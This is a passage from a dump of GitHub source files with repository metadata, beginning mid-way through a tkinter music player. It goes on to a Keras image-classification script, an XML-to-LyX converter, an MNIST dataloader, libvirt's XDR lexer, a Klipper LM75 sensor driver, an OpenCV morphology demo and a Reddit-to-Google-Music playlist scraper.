prev)\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume)\r\n\r\n def skip_not_music(self, prev):\r\n if self.random_song:\r\n self.song_name = self.random_file(self, self.song_name)\r\n else:\r\n self.song_name = self.switch_file(self.song_name, prev)\r\n ext = os.path.splitext(self.song_name)[-1].lower()\r\n if ext not in self.ext_list:\r\n self.next_song(self, prev)\r\n \r\n def change_volume(self, minus):\r\n if minus: \r\n if self.player_volume - 10 >= 0: self.player_volume -= 10\r\n else: self.player_volume += 10\r\n volumeLabel['text'] = \"Громкость: \" + str(self.player_volume)\r\n player.audio_set_volume(self.player_volume)\r\n\r\n def stop_player():\r\n player.stop()\r\n nowPlaying[\"text\"] = \"Сейчас ничего не играет\"\r\n\r\ngui = Tk()\r\ngui.geometry('500x250')\r\ngui.configure(background = '#333333')\r\ngui.resizable(width=True, height=False) \r\n\r\nframe_top = Frame(background = '#111111')\r\nframe_mid = Frame(background = '#555555')\r\n\r\nframe_midtop = Frame(frame_mid, background = '#555555')\r\nframe_midmid = Frame(frame_mid, background = '#555555')\r\nframe_midbot = Frame(frame_mid, background = '#555555')\r\n\r\nstartMusicButton = Button(frame_top, text = \"Включить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.start_player(Music)))\r\npauseMusicButton = Button(frame_midbot, text = \"▍▍\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font=20,\r\n fg = '#EEEEEE',\r\n command = lambda: (player.pause()))\r\nprevMusicButton = Button(frame_midbot, text = \"🡸\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, True)))\r\nnextMusicButton = Button(frame_midbot, text = \"🡺\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.next_song(Music, False)))\r\nstopMusicButton = Button(frame_top, text = \"Выключить\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#111111\",\r\n font=('Comic Sans MS', 20),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.stop_player()))\r\nrandomCheck = Checkbutton(frame_top, text='Перемешать треки',\r\n background = \"#111111\",\r\n font=('Comic Sans MS', 10),\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_random(Music)))\r\nvolumeScaleMinus = Button(frame_midmid, text = \"-\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n fg = '#EEEEEE',\r\n font = 20,\r\n command = lambda: (Music.change_volume(Music, True)))\r\nvolumeScalePlus= Button(frame_midmid, text = \"+\",\r\n highlightthickness = 0, bd = 0,\r\n background=\"#555555\",\r\n font = 20,\r\n fg = '#EEEEEE',\r\n command = lambda: (Music.change_volume(Music, False)))\r\n\r\nvolumeLabel = Label(frame_midmid, background = \"#555555\", text = 'Громкость: 50', font=('Comic Sans MS', 10), fg = '#EEEEEE')\r\nnowPlaying = Label(frame_midtop, background = \"#555555\", text = 'Сейчас ничего не играет', font=('Comic Sans MS', 10), fg = '#EEEEEE', width = 200)\r\n\r\nframe_top.pack(side = 'top', fill = 'both')\r\nstartMusicButton.pack(side = 'left')\r\nstopMusicButton.pack(side = 'left')\r\nrandomCheck.pack(side = 'left')\r\n\r\nframe_mid.pack(side = 'left')\r\n\r\nframe_midtop.pack(side = 'top')\r\nnowPlaying.pack(side = 'left', fill = 'x')\r\n\r\nframe_midmid.pack(side = 'top')\r\nvolumeScaleMinus.pack(side = 'left')\r\nvolumeLabel.pack(side = 'left')\r\nvolumeScalePlus.pack(side = 'left')\r\n\r\nframe_midbot.pack(side = 'top')\r\npauseMusicButton.pack(side = 'left')\r\nprevMusicButton.pack(side = 'left')\r\nnextMusicButton.pack(side = 'left')\r\n\r\ngui.mainloop()","repo_name":"CharaFour/Dont-open","sub_path":"opmain.py","file_name":"opmain.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8135969840","text":"import numpy as np\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, Input, MaxPooling2D, LeakyReLU, Softmax, GlobalAveragePooling2D, BatchNormalization, Dropout \r\nfrom tensorflow.keras.models import Sequential, Model, load_model, save_model\r\nfrom tensorflow.keras.optimizers import Adam\r\nimport pandas as pd\r\n#1. DATA\r\n#.npy Load\r\nx = np.load('../../data/npy/LPD_train_x1.npy', allow_pickle=True)\r\ny = np.load('../../data/npy/LPD_train_y1.npy', allow_pickle=True)\r\ntarget = np.load('../../data/npy/target1.npy', allow_pickle=True)\r\n\r\nfrom tensorflow.keras.applications.efficientnet import preprocess_input\r\nx = preprocess_input(x)\r\ntarget = preprocess_input(target)\r\n\r\n# print(x.shape)\r\n# print(y.shape)\r\n# print(target.shape)\r\n\r\n#generagtor\r\nidg = ImageDataGenerator(\r\n zoom_range = 0.1,\r\n height_shift_range=0.1,\r\n width_shift_range=0.1,\r\n rotation_range=32 \r\n)\r\n\r\nidg2 = ImageDataGenerator()\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_val, y_train, y_val = train_test_split(x, y, train_size = 0.9, random_state = 128, shuffle = True)\r\n\r\n#control\r\nimage_size = (128, 128, 3)\r\nbts = 32\r\noptimizer = Adam(learning_rate = 1e-3)\r\n\r\ntrain_generator = idg.flow(x_train, y_train, batch_size = bts, seed=1024)\r\nvalid_generator = idg2.flow(x_val, y_val)\r\ntest_generator = idg2.flow(target)\r\n\r\n#2. MODEL\r\nfrom tensorflow.keras.applications import EfficientNetB5\r\nTF = EfficientNetB5(weights=\"imagenet\", include_top=False, input_shape = image_size) \r\nTF.trainable = True\r\nx = TF.output\r\nx = GlobalAveragePooling2D()(x)\r\nx = Flatten()(x)\r\nx = Dense(2048, activation='relu')(x)\r\noutputs = Dense(1000, activation='softmax')(x)\r\nmodel = Model(inputs = TF.input, outputs = outputs)\r\nmodel.summary()\r\n\r\n#COMPILE \r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau\r\nmodel.compile(loss = 'categorical_crossentropy', optimizer = optimizer, metrics = ['acc'])\r\nmc = ModelCheckpoint('C:/data/MC/best_LT_vision2_{epoch:02d}-{val_loss:.4f}.hdf5', save_best_only=True, mode = 'auto')\r\nes = EarlyStopping(monitor='val_loss', patience=5, verbose=1, mode='auto')\r\nrl = ReduceLROnPlateau(monitor='val_loss', factor=0.3, patience=3, verbose=1, mode='auto')\r\nmodel.fit_generator(train_generator, epochs=100, verbose=1, validation_data= valid_generator, callbacks=[es, rl, mc])\r\n\r\nmodel.save('C:/data/h5/LT_vision_model2_3.h5')\r\nmodel.save_weights('C:/data/h5/LT_vision_3.h5')\r\n# model = load_model('C:/data/h5/fish_model2.h5')\r\n# model.load_weights('C:/data/h5/fish_weight.h5')\r\n\r\n#EVAL\r\nloss, acc = model.evaluate(valid_generator)\r\nprint(\"loss : \", loss)\r\nprint(\"acc : \", acc)\r\n\r\nresult = pd.read_csv(\"C:/data/LPD_competition/sample.csv\")\r\n\r\n# prd = model.predict(x_test)\r\n# filenames = xy_test.filenames\r\n# nb_samples = len(filenames)\r\n# print(nb_samples)\r\nprd = model.predict_generator(test_generator, steps=72000)\r\na = pd.DataFrame()\r\nprd = pd.Series(np.argmax(prd,axis=-1))\r\nprd = pd.concat([a,prd],axis=1)\r\nresult.iloc[:,1] = prd.sort_index().values\r\nresult.to_csv('C:/data/LPD_competition/sample_2.csv')","repo_name":"TaeYeon-kim-ai/STUDY_1.py","sub_path":"dacon/lotte_vision_1/LT_model10_Effition_B5.py","file_name":"LT_model10_Effition_B5.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"71246478122","text":"#! /usr/bin/env python\n\nimport re\nimport sys\n\nimport xml.etree.ElementTree as ET\nimport xml.parsers.expat as expat\n\ndoc = sys.argv[1]\nlang = sys.argv[2]\ninput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'.xml'\noutput_filename = '/extra_disk/landwijzer_werkstuk/text/'+doc+'-'+lang+'-back.lyx'\n\nsentence_end_re=re.compile('([!?]|[^.][.]|[\\n])')\nheader = False\ntext = ''\ndef write_sentence(s):\n max_len = 78\n while len(s) > max_len:\n split = s.rfind(' ', 0, max_len)\n if split >= 0:\n output_file.write(s[:split]+'\\n')\n s = s[split:]\n else:\n break\n output_file.write(s.rstrip('\\n')+'\\n')\ndef write_text():\n global text\n if len(text) > 0:\n # split on end of sentences\n splitted = sentence_end_re.split(text.rstrip('\\n'))\n while len(splitted) > 1:\n sentence = splitted[0]+splitted[1]\n write_sentence(sentence)\n splitted = splitted[2:]\n if len(splitted) == 1:\n if splitted[0] != '':\n write_sentence(splitted[0])\n text = ''\ndef comment(data):\n write_text()\n\n output_file.write('#'+data+'\\n')\ndef start_element(name, attrs):\n global header\n write_text()\n\n # special tags\n if name == 'lyx2xml':\n return\n if name == 'empty_line':\n output_file.write('\\n')\n return\n if name == '__param':\n start_tab = attrs.pop('start_tab')\n if start_tab == \"True\":\n output_file.write('\\t')\n value_present = attrs.pop('value_present')\n if value_present == \"True\":\n param = ' '.join([k+' '+v for (k, v) in attrs.items()])\n else:\n param = ' '.join([k for k in attrs.keys()])\n output_file.write(param+'\\n')\n return\n\n # xml-like structure\n if name.startswith('__'):\n if len(attrs) > 0:\n param = ' '.join([k+'=\"'+v+'\"' for (k, v) in attrs.items()])\n output_file.write('<'+name[2:]+' '+param+'>\\n')\n else:\n output_file.write('<'+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = True\n output_file.write('\\\\begin'+name)\n else:\n output_file.write('\\\\'+name)\n if len(attrs) > 0:\n output_file.write(' '+' '.join(attrs.values())+'\\n')\n else:\n output_file.write('\\n')\ndef end_element(name):\n global header\n write_text()\n\n # special tags\n if name == '__param':\n return\n\n # xml-like structure\n if name.startswith('__'):\n if name[2:] not in ('features', 'column'):\n output_file.write(''+name[2:]+'>\\n')\n return\n\n # lyx blocks\n if name.startswith('_'):\n if name == '_ert_inset':\n name = '_inset'\n if name == '_header':\n header = False\n output_file.write('\\\\end'+name+'\\n')\ndef char_data(data):\n global text\n global header\n if header is True:\n output_file.write(data.replace('',''))\n return\n\n if len(text) == 0:\n if data == '\\n':\n return\n text += data.replace('','')\n\nwith open(output_filename, 'w') as output_file:\n p = expat.ParserCreate()\n\n p.CommentHandler = comment\n p.StartElementHandler = start_element\n p.EndElementHandler = end_element\n p.CharacterDataHandler = char_data\n \n with open(input_filename, 'rb') as input_file:\n p.ParseFile(input_file)\n","repo_name":"EricSeynaeve/landwijzer_werkstuk","sub_path":"bin/xml2lyx.py","file_name":"xml2lyx.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"952276593","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nimport stat\n\nusage_mesg = 'Usage: prepare-tandemK-high.py '\n\nmzXML_dir = sys.argv[1]\nfilename_fasta_pro = sys.argv[2]\ndb_name = re.sub('.pro$','', os.path.basename(filename_fasta_pro))\ndb_name = re.sub('.fasta$','',db_name)\ndb_name = re.sub('.fa$','',db_name)\n\nabs_path_script = os.path.abspath(__file__)\nMSTB_HOME = os.path.abspath( os.path.join(abs_path_script, '..', '..') )\n\nfilename_taxon_xml = 'tandem-taxonomy.xml'\nfilename_taxon_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_taxon_xml)\n\nfilename_tandem_xml = 'tandemK.low.xml'\nfilename_in_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_tandem_xml)\n\nfilename_sh = 'run-tandemK.sh'\nfilename_tandem_exe = os.path.join(MSTB_HOME,'extern','tandem.linux.exe') \nfilename_default_xml = os.path.join(MSTB_HOME,'search','isb_default_input_kscore.xml')\n\nf_taxon_tmpl = open(filename_taxon_tmpl,'r')\ntaxon_tmpl = ''.join( f_taxon_tmpl.readlines() )\nf_taxon_tmpl.close()\n\nsys.stderr.write('Write %s.\\n'%filename_taxon_xml)\nf_taxon = open(filename_taxon_xml,'w')\nf_taxon.write( taxon_tmpl.format(DB_FASTAPRO=filename_fasta_pro, DB_NAME=db_name) )\nf_taxon.close()\n\nf_in_tmpl = open(filename_in_tmpl,'r')\nin_tmpl = ''.join( f_in_tmpl.readlines() )\nf_in_tmpl.close()\n\nf_sh = open(filename_sh,'w')\nf_sh.write('#!/bin/bash\\n')\nfor filename in os.listdir(mzXML_dir):\n if( not filename.upper().endswith('.MZXML') ):\n continue\n filename_base = '.'.join(filename.split('.')[:-1])\n filename_in = '%s.%s.tandemK.xml'%(filename_base,db_name)\n\n in_params = dict()\n in_params['DB_NAME'] = db_name\n in_params['TANDEMK_DEFAULT_PARAM'] = filename_default_xml\n in_params['FILENAME_TAXON'] = filename_taxon_xml\n in_params['FILENAME_MZXML'] = os.path.abspath(os.path.join(mzXML_dir, filename))\n filename_out = '%s.%s.tandemK.out'%(filename_base,db_name)\n in_params['FILENAME_OUT'] = filename_out\n in_params['FILENAME_LOG'] = '%s.%s.tandemK.log'%(filename_base,db_name)\n\n sys.stderr.write('Write %s.\\n'%filename_in)\n f_in = open(filename_in,'w')\n f_in.write( in_tmpl.format(**in_params) )\n f_in.close()\n \n f_sh.write(\"%s %s\\n\"%(filename_tandem_exe, filename_in))\nf_sh.close()\n\nos.chmod(filename_sh,stat.S_IRWXU)\nsys.stderr.write('\\nTandemK is ready. Run %s.\\n\\n'%(filename_sh))\n","repo_name":"marcottelab/MSblender","sub_path":"msblender-scripts/prepare-tandemK-low.py","file_name":"prepare-tandemK-low.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"22187868104","text":"\"\"\"MNIST dataset generation and dataloader\r\n\"\"\"\r\n\r\nimport torch\r\nimport torchvision\r\nimport numpy as np\r\nfrom .utils_dataset import TransformsDataset\r\n\r\nclass ToBinary(object):\r\n def __init__(self, class_0):\r\n self.class_0 = class_0\r\n \r\n def __call__(self, label):\r\n return np.float32([not (label == self.class_0)])\r\n \r\n def __repr__(self):\r\n return self.__class__.__name__ + '()'\r\n\r\nclass Subset(torch.utils.data.sampler.SubsetRandomSampler):\r\n def __iter__(self):\r\n return (self.indices[i] for i in range(len(self.indices)))\r\n \r\ndef get_dataloaders(opt, mode):\r\n mode_ = 'train' if mode=='train' else opt.split_validation\r\n mnist_dataset = torchvision.datasets.MNIST('./', train=mode_!='test', download=True,\r\n transform=torchvision.transforms.Compose([\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.5,), (0.5,))\r\n ]))\r\n \r\n valid_size = 0.1\r\n num_train = len(mnist_dataset)\r\n indices = []\r\n \r\n # only using the two selected classes\r\n for i in range(len(mnist_dataset)):\r\n if mnist_dataset[i][1] in [opt.class_0_mnist, opt.class_1_mnist]:\r\n indices.append(i)\r\n \r\n if mode_!='test':\r\n valid_size = 0.1\r\n num_train = len(indices)\r\n split = int(valid_size * num_train)\r\n # get a fixed random validation set for every run\r\n np.random.RandomState(0).shuffle(indices)\r\n indices = {'train':indices[split:], 'val':indices[:split]}[mode_]\r\n \r\n mnist_dataset = TransformsDataset(mnist_dataset, ToBinary(opt.class_0_mnist), i=1)\r\n if mode=='train':\r\n sampler = torch.utils.data.sampler.SubsetRandomSampler\r\n else:\r\n sampler = Subset\r\n \r\n return torch.utils.data.DataLoader(mnist_dataset, \r\n batch_size=opt.batch_size, sampler=sampler(indices), num_workers=0)","repo_name":"ricbl/gradient-direction-of-robust-models","sub_path":"src/direct_method/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"8504655862","text":"from django.urls import path\n\nfrom advanced_report_builder.views.datatables import TableModal, FieldModal\n\napp_name = 'report_builder'\n\n\nurlpatterns = [\n path('table/modal//', TableModal.as_view(), name='table_modal'),\n path('table/modal/field//', FieldModal.as_view(), name='field_modal'),\n]\n","repo_name":"nagwagabr74/plots","sub_path":"env/Lib/site-packages/advanced_report_builder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1409189138","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n\nimport abc\n\n\nclass XDRReader:\n def __init__(self, fp):\n self.fp = fp\n self.lookahead = \"\"\n self.lookbehind = \"\"\n self.line = 1\n self.column = 0\n\n def _read(self):\n if len(self.lookahead) > 0:\n c = self.lookahead[0:1]\n self.lookahead = self.lookahead[1:]\n return c\n return self.fp.read(1)\n\n def peek(self, skip=0):\n need = 1 + skip\n if len(self.lookahead) < need:\n self.lookahead = self.lookahead + self.fp.read(need - len(self.lookahead))\n if len(self.lookahead) < need:\n return None\n\n return self.lookahead[skip : skip + 1]\n\n def last(self, skip=0):\n if (skip + 1) > len(self.lookbehind):\n return None\n return self.lookbehind[skip]\n\n def next(self):\n c = self._read()\n line = self.line\n column = self.column\n if c == \"\\n\":\n self.line = self.line + 1\n self.column = 0\n else:\n self.column = self.column + 1\n self.lookbehind = c + self.lookbehind\n if len(self.lookbehind) > 2:\n self.lookbehind = self.lookbehind[0:2]\n return c, line, column\n\n\nclass XDRToken(abc.ABC):\n def __init__(self, line, column, value):\n self.line = line\n self.column = column\n self.value = value\n\n def __eq__(self, other):\n return (\n type(self) is type(other)\n and self.line == other.line\n and self.column == other.column\n and self.value == other.value\n )\n\n @classmethod\n @abc.abstractmethod\n def start(cls, reader):\n pass\n\n @classmethod\n @abc.abstractmethod\n def end(cls, reader):\n pass\n\n @classmethod\n def consume(cls, reader):\n c, line, col = reader.next()\n buf = c\n while True:\n if cls.end(reader):\n break\n c, _, _ = reader.next()\n buf = buf + c\n return cls(line, col, buf)\n\n def __repr__(self):\n return \"%s{line=%d,col=%d,value={{{%s}}}}\" % (\n self.__class__.__name__,\n self.line,\n self.column,\n self.value,\n )\n\n\nclass XDRTokenComment(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek() == \"/\" and reader.peek(skip=1) == \"*\"\n\n @classmethod\n def end(cls, reader):\n c1 = reader.last(skip=1)\n c2 = reader.last()\n if c1 == \"*\" and c2 == \"/\":\n return True\n\n if reader.peek() is None:\n raise Exception(\n \"EOF before closing comment starting at %d:%d\"\n % (reader.line, reader.column)\n )\n\n\nclass XDRTokenIdentifier(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c.isalpha()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n if c is None:\n return True\n return not c.isalnum() and c != \"_\"\n\n\nclass XDRTokenPunctuation(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c in [\";\", \"=\", \"{\", \"}\", \",\", \"[\", \"]\", \"<\", \">\", \"*\", \"(\", \")\", \":\"]\n\n @classmethod\n def end(cls, reader):\n return True\n\n\nclass XDRTokenConstant(XDRToken):\n @classmethod\n def start(cls, reader):\n c1 = reader.peek()\n c2 = reader.peek(skip=1)\n return c1.isdecimal() or (c1 == \"-\" and c2 is not None and c2.isdecimal())\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return (\n not c.isdecimal()\n and not c == \".\"\n and not c.lower() in [\"x\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n )\n\n\nclass XDRTokenCEscape(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.column == 0 and reader.peek() == \"%\"\n\n @classmethod\n def end(cls, reader):\n return reader.peek() == \"\\n\"\n\n\nclass XDRTokenSpace(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek().isspace()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return c is None or not c.isspace()\n\n\nclass XDRLexer:\n def __init__(self, fp):\n self.reader = XDRReader(fp)\n self.lookahead = []\n\n def _token(self):\n tokenTypes = [\n XDRTokenComment,\n XDRTokenIdentifier,\n XDRTokenCEscape,\n XDRTokenPunctuation,\n XDRTokenConstant,\n XDRTokenSpace,\n ]\n while True:\n if self.reader.peek() is None:\n return None\n\n for tokenType in tokenTypes:\n if tokenType.start(self.reader):\n ret = tokenType.consume(self.reader)\n if type(ret) not in [XDRTokenSpace, XDRTokenComment]:\n return ret\n\n def next(self):\n if len(self.lookahead) > 0:\n token = self.lookahead[0]\n self.lookahead = self.lookahead[1:]\n return token\n return self._token()\n\n def peek(self):\n if len(self.lookahead) == 0:\n token = self._token()\n if token is None:\n return None\n self.lookahead.append(token)\n return self.lookahead[0]\n","repo_name":"libvirt/libvirt","sub_path":"scripts/rpcgen/rpcgen/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":1243,"dataset":"github-code","pt":"19"}
+{"seq_id":"11332346279","text":"#Import Libraries\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('assets/bug1.png',0)\nimg = cv2.resize(img,(400,400))\nimg = cv2.bitwise_not(img)\ncv2.imshow('Original',img)\n\n#define the kernal\nkernal = np.ones((3,3),np.uint8)\n\n#erosion of the image ie.removes pixels on object boundaries \nerosion = cv2.erode(img,kernal,iterations = 9)\ncv2.imshow('erosion method',erosion)\n\n#Dilation adds pixels to the boundaries of objects in an image\ndilation = cv2.dilate(img,kernal,iterations = 9)\ncv2.imshow('Dilation',dilation)\n\n\n\n\nopening = cv2.morphologyEx(img,cv2.MORPH_OPEN,kernal,iterations = 9)\ncv2.imshow('Opening',opening)\n\n#The closing operation dilates an image and then erodes the dilated image \nclosing = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernal,iterations = 9)\ncv2.imshow('Closing',closing)\n\n\n\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Jem1D/DIP-codes","sub_path":"exp10_morph.py","file_name":"exp10_morph.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23948115333","text":"import logging\nfrom . import bus\n\nLM75_CHIP_ADDR = 0x48\nLM75_I2C_SPEED = 100000\nLM75_REGS = {\n 'TEMP' : 0x00,\n 'CONF' : 0x01,\n 'THYST' : 0x02,\n 'TOS' : 0x03,\n 'PRODID' : 0x07 # TI LM75A chips only?\n}\nLM75_REPORT_TIME = .8\n# Temperature can be sampled at any time but the read aborts\n# the current conversion. Conversion time is 300ms so make\n# sure not to read too often.\nLM75_MIN_REPORT_TIME = .5\n\nclass LM75:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[-1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(config, LM75_CHIP_ADDR,\n LM75_I2C_SPEED)\n self.mcu = self.i2c.get_mcu()\n self.report_time = config.getfloat('lm75_report_time', LM75_REPORT_TIME,\n minval=LM75_MIN_REPORT_TIME)\n self.temp = self.min_temp = self.max_temp = 0.0\n self.sample_timer = self.reactor.register_timer(self._sample_lm75)\n self.printer.add_object(\"lm75 \" + self.name, self)\n self.printer.register_event_handler(\"klippy:connect\",\n self.handle_connect)\n\n def handle_connect(self):\n self._init_lm75()\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def setup_minmax(self, min_temp, max_temp):\n self.min_temp = min_temp\n self.max_temp = max_temp\n\n def setup_callback(self, cb):\n self._callback = cb\n\n def get_report_time_delta(self):\n return self.report_time\n\n def degrees_from_sample(self, x):\n # The temp sample is encoded in the top 9 bits of a 16-bit\n # value. Resolution is 0.5 degrees C.\n return x[0] + (x[1] >> 7) * 0.5\n\n def _init_lm75(self):\n # Check and report the chip ID but ignore errors since many\n # chips don't have it\n try:\n prodid = self.read_register('PRODID', 1)[0]\n logging.info(\"lm75: Chip ID %#x\" % prodid)\n except:\n pass\n\n def _sample_lm75(self, eventtime):\n try:\n sample = self.read_register('TEMP', 2)\n self.temp = self.degrees_from_sample(sample)\n except Exception:\n logging.exception(\"lm75: Error reading data\")\n self.temp = 0.0\n return self.reactor.NEVER\n\n if self.temp < self.min_temp or self.temp > self.max_temp:\n self.printer.invoke_shutdown(\n \"LM75 temperature %0.1f outside range of %0.1f:%.01f\"\n % (self.temp, self.min_temp, self.max_temp))\n\n measured_time = self.reactor.monotonic()\n self._callback(self.mcu.estimated_print_time(measured_time), self.temp)\n return measured_time + self.report_time\n\n def read_register(self, reg_name, read_len):\n # read a single register\n regs = [LM75_REGS[reg_name]]\n params = self.i2c.i2c_read(regs, read_len)\n return bytearray(params['response'])\n\n def write_register(self, reg_name, data):\n if type(data) is not list:\n data = [data]\n reg = LM75_REGS[reg_name]\n data.insert(0, reg)\n self.i2c.i2c_write(data)\n\n def get_status(self, eventtime):\n return {\n 'temperature': round(self.temp, 2),\n }\n\n\ndef load_config(config):\n # Register sensor\n pheaters = config.get_printer().load_object(config, \"heaters\")\n pheaters.add_sensor_factory(\"LM75\", LM75)\n","repo_name":"Klipper3d/klipper","sub_path":"klippy/extras/lm75.py","file_name":"lm75.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":7817,"dataset":"github-code","pt":"19"}
+{"seq_id":"19653990319","text":"from flask import Blueprint\nfrom flask import flash\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom werkzeug.exceptions import abort\nimport praw\nfrom praw.models import MoreComments\nfrom google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom gmusicapi import Mobileclient\nfrom uuid import getnode as getmac\nfrom scrapper.google_config import g_music\nimport os\n\nimport re\n\nreddit_app_id = os.getenv(\"SCRAPPER_REDDIT_ID\")\nreddit_app_secret = os.getenv(\"SCRAPPER_REDDIT_SECRET\")\nreddit = praw.Reddit(user_agent=\"Comment Extraction\",\n client_id=reddit_app_id, client_secret=reddit_app_secret)\n\nclient = language.LanguageServiceClient()\n\nbp = Blueprint(\"reddit\", __name__)\n\n\n@bp.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n song_match_regexp = r\"^(.*)\\s(by|-)([A-Za-z\\t ]+)+\"\n \"\"\"Scrape a reddit post.\"\"\"\n if request.method == \"POST\":\n url = request.form[\"url\"]\n playlist = request.form[\"playlist\"]\n error = None\n \n\n if not url:\n error = \"URL is required.\"\n if not playlist:\n playlist = \"Songs from Reddit \" + url\n if error is not None:\n flash(error)\n else:\n print(\"Parsing the following URL: \" + url) \n \n song_ids = []\n submission = reddit.submission(url=url)\n songs = []\n submission.comment_sort = \"top\"\n submission.comments.replace_more(limit=1)\n exclude_words = [\"SONG\", \"COMMENT\", \"ICON\", \"COMMENTS\", \"SONGS\", \"ICONS\", \"ALBUM\", \"ALBUMS\"]\n print(\"Fetching top comments\")\n for top_level_comment in submission.comments:\n # We only want short-ish replies as we're looking for songs and not meta or chatter\n if len(top_level_comment.body) < 150: \n cleaned_comment = clean(top_level_comment.body)\n if re.match(song_match_regexp, cleaned_comment, re.IGNORECASE):\n song_match = re.match(song_match_regexp, cleaned_comment)\n song_to_search = song_match.group(1) + \" \" + song_match.group(2) + \" \" + song_match.group(3)\n songs.append(song_to_search)\n else:\n print(\"Extracting entities\")\n document = types.Document(\n content=cleaned_comment,\n type=enums.Document.Type.PLAIN_TEXT) \n # Extract entities of the comments\n entities = client.analyze_entities(document=document).entities\n # If the entity is either work of art or a person, append it to the list.\n song_and_artist = []\n for entity in entities: \n # entity type number 5 is WORK_OF_ART \n if (entity.type == 5 and entity.name.upper() not in exclude_words) or entity.type == 1:\n song_and_artist.append(entity.name)\n if len(song_and_artist) > 0:\n songs.append(\" - \".join(song_and_artist))\n\n print(\"Matching songs with Google play music\")\n for song in songs: \n search_result = g_music.search(song, max_results=20) \n print(\"Searching for \" + song)\n if(\"song_hits\" in search_result):\n if len(search_result[\"song_hits\"]) > 0:\n song_id = search_result[\"song_hits\"][0][\"track\"][\"storeId\"]; \n song_ids.append(song_id) \n \n print(\"Creating playist: \" + playlist)\n playist_id = g_music.create_playlist(playlist, \"\", True)\n print(\"adding songs to playlist\" + playist_id )\n g_music.add_songs_to_playlist(playist_id, song_ids) \n return render_template(\"reddit/index.html\", posts=songs, google_auth = g_music.is_authenticated())\n\n return render_template(\"reddit/index.html\", google_auth = g_music.is_authenticated())\n\ndef clean(comment):\n comment = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', comment, flags=re.MULTILINE)\n comment = comment.replace(\"[\", \"\").replace(\"(\", \"\").replace(\"]\", \"\").replace(\")\", \"\")\n return comment\n\n","repo_name":"jeremy-albuixech/scrapper","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
